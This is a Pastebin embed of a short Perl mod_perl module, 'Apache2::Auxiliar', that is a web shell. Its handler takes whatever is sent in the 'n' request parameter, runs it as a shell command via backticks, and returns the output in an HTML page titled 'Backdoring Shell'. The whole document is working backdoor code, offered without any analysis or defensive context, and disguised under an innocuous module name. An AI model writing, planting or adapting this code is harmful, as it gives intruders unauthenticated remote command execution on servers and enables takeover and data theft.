document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. package Apache2::Auxiliar;
  2. use strict;
  3. use Apache2::Const qw(:common);
  4. use Apache2::RequestIO  ();
  5. use Apache2::RequestRec ();
  6. use Apache2::ServerUtil ();
  7. use Apache2::ServerRec  ();
  8. use CGI ;
  9.  
  10. sub handler {
  11.     my $r = shift;
  12.     $r->content_type(\'text/html\');
  13.     my $q = new CGI($r);
  14.     my $comando = $q->param(\'n\') ;
  15.     my $respuesta = `$comando` ;
  16.     $r->print(<<END);
  17. <HTML>
  18. <HEAD>
  19. <TITLE>Backdoring Shell</TITLE>
  20. </HEAD>
  21. <BODY>
  22. <H1>Command: </H1>
  23. $respuesta
  24. </BODY>
  25. </HTML>
  26. END
  27.    return OK;
  28. }
  29. 1;
');